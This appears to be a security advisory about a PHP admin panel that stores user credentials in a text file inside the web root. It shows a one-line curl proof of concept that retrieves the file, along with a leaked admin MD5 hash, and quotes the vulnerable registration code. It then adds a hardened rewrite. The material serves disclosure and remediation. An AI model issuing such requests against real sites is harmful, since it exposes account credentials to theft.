[1] Administrative Credential Disclosure

PoC:

```
root@kali:/# curl http://localhost/home/caspers/public_html/demo/admin/userpwdadfasdfre.txt
admin:3a4ebf16a4795ad258e5408bae7be341
```

Vulnerable Code:

[+] admin/common.php

```php
// Check user existence
// The relative path resolves to the script's own directory, so the credential
// file is created inside the web root and is served like any other static file.
$pfile = fopen("userpwdadfasdfre.txt","a+");
rewind($pfile);
while (!feof($pfile)) {
    $line = fgets($pfile);
    $tmp = explode(':', $line);
    if ($tmp[0] == $user) {
        $errorText = "The selected user name is taken!";
        break;
    }
}
// If everything is OK -> store user data
if ($errorText == ''){
    // "Secure" password string: a bare, unsalted MD5 of the password
    $userpass = md5($pass1);
    fwrite($pfile, "\r\n$user:$userpass");
}
fclose($pfile);
```
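A hardened rewrite of the registration logic, added here as an example; it is not part of the original advisory or of the affected project, and the storage path `/var/lib/demo/users.txt` and the function name `registerUser` are assumptions. It keeps the credential file outside the document root, restricts its permissions, holds a lock across the check-and-append, and replaces unsalted `md5()` with `password_hash()`.

```php
<?php
// Added example, not the project's code. Assumes $user, $pass1 and $errorText
// are supplied by the caller exactly as in the original admin/common.php.
// Credential store lives OUTSIDE the web root (path is an assumption).
define('USER_DB', '/var/lib/demo/users.txt');

function registerUser(string $user, string $pass1, string &$errorText): bool
{
    // Reject names that could inject a ':' separator or a newline into the file
    if (!preg_match('/^[A-Za-z0-9_.-]{1,64}$/', $user)) {
        $errorText = "Invalid user name!";
        return false;
    }
    // 'c+' opens read/write and creates the file if missing without truncating it
    $pfile = fopen(USER_DB, 'c+');
    if ($pfile === false) {
        $errorText = "Cannot open user store!";
        return false;
    }
    // Only the web server account may read the file
    chmod(USER_DB, 0600);
    // Exclusive lock: the original's check-then-append raced between requests
    if (!flock($pfile, LOCK_EX)) {
        fclose($pfile);
        $errorText = "Could not lock user store!";
        return false;
    }
    rewind($pfile);
    while (($line = fgets($pfile)) !== false) {
        // Limit to 2 fields; password_hash() output contains '$' but never ':'
        $tmp = explode(':', rtrim($line, "\r\n"), 2);
        if ($tmp[0] === $user) {
            $errorText = "The selected user name is taken!";
            flock($pfile, LOCK_UN);
            fclose($pfile);
            return false;
        }
    }
    // Salted, slow hash instead of md5(); check logins with password_verify()
    $userpass = password_hash($pass1, PASSWORD_DEFAULT);
    fseek($pfile, 0, SEEK_END);
    fwrite($pfile, "$user:$userpass\n");
    fflush($pfile);
    flock($pfile, LOCK_UN);
    fclose($pfile);
    return true;
}
```

Even with the file moved, a web server rule denying access to any remaining `*.txt` under `admin/` gives a second layer should a deployment put the store back inside `public_html`.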